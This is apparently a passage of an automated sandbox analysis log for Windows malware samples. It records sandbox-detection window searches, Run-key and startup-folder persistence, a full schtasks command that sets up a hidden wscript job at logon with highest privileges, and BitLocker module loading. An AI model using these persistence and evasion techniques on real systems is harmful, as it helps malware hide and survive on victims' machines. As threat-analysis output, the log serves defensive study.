Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072543001\ae70ca0159.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072543001\ae70ca0159.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072543001\ae70ca0159.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072543001\ae70ca0159.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072543001\ae70ca0159.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072543001\ae70ca0159.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1072543001\ae70ca0159.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1072543001\ae70ca0159.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1072543001\ae70ca0159.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1072543001\ae70ca0159.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1072543001\ae70ca0159.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1072543001\ae70ca0159.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1072543001\ae70ca0159.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1072543001\ae70ca0159.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1072548001\5a4a47dccd.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1072548001\5a4a47dccd.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1072548001\5a4a47dccd.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1072548001\5a4a47dccd.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1072548001\5a4a47dccd.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1072548001\5a4a47dccd.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1072548001\5a4a47dccd.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1072548001\5a4a47dccd.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1072549001\loqVSeJ.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1072549001\loqVSeJ.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1072549001\loqVSeJ.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1072549001\loqVSeJ.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1072549001\loqVSeJ.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1072549001\loqVSeJ.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1072549001\loqVSeJ.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1072549001\loqVSeJ.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1072549001\loqVSeJ.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\PAL947G2R107U02V5ZPL.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\PAL947G2R107U02V5ZPL.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\PAL947G2R107U02V5ZPL.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\PAL947G2R107U02V5ZPL.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\PAL947G2R107U02V5ZPL.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\PAL947G2R107U02V5ZPL.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\FQZHGI4TELUEK712J739LWFDT7.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\FQZHGI4TELUEK712J739LWFDT7.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\FQZHGI4TELUEK712J739LWFDT7.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\FQZHGI4TELUEK712J739LWFDT7.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\FQZHGI4TELUEK712J739LWFDT7.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1072543001\ae70ca0159.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1072543001\ae70ca0159.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1072543001\ae70ca0159.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1072543001\ae70ca0159.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1072543001\ae70ca0159.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1072543001\ae70ca0159.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1072543001\ae70ca0159.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1072543001\ae70ca0159.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1072543001\ae70ca0159.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1072551001\Bjkm5hE.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1072551001\Bjkm5hE.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1072551001\Bjkm5hE.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1072551001\Bjkm5hE.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1072551001\Bjkm5hE.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1072551001\Bjkm5hE.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1072551001\Bjkm5hE.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1072551001\Bjkm5hE.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1072551001\Bjkm5hE.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1072555001\Fe36XBk.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1072555001\Fe36XBk.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1072555001\Fe36XBk.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1072555001\Fe36XBk.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1072555001\Fe36XBk.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1072555001\Fe36XBk.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1072555001\Fe36XBk.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1072555001\Fe36XBk.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1072556001\8b3fbc1053.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1072556001\8b3fbc1053.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1072556001\8b3fbc1053.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1072556001\8b3fbc1053.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1072556001\8b3fbc1053.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1072556001\8b3fbc1053.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1072556001\8b3fbc1053.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1072556001\8b3fbc1053.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1072556001\8b3fbc1053.exe	Window searched: window name: Regmonclass

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com

Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "AchillesGuard" /tr "wscript //B 'C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.js'" /sc onlogon /F /RL HIGHEST

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat

Source: C:\Users\user\Desktop\random.exe

File created: C:\Windows\Tasks\skotes.job

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dfd80aba08.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dfd80aba08.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ae70ca0159.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ae70ca0159.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 4b3b305d14.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 4b3b305d14.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 77c6b3ca0a.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 77c6b3ca0a.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run e6710ad235.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run e6710ad235.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run a4377b3e83.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run a4377b3e83.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072554001\dDFw6mJ.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0
Source: C:\Users\user\AppData\Local\Temp\1072554001\dDFw6mJ.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0
Source: C:\Users\user\AppData\Local\Temp\1072554001\dDFw6mJ.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0
Source: C:\Users\user\AppData\Local\Temp\1072554001\dDFw6mJ.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Source: C:\Users\user\Desktop\random.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072546001\487dac876e.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072546001\487dac876e.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072546001\487dac876e.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072546001\487dac876e.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072546001\487dac876e.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072546001\487dac876e.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072546001\487dac876e.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072546001\487dac876e.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072546001\487dac876e.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072546001\487dac876e.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072546001\487dac876e.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072546001\487dac876e.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1072549001\loqVSeJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1072549001\loqVSeJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1072549001\loqVSeJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1072549001\loqVSeJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1072549001\loqVSeJ.exe	Process information set: NOOPENFILEERRORBOX
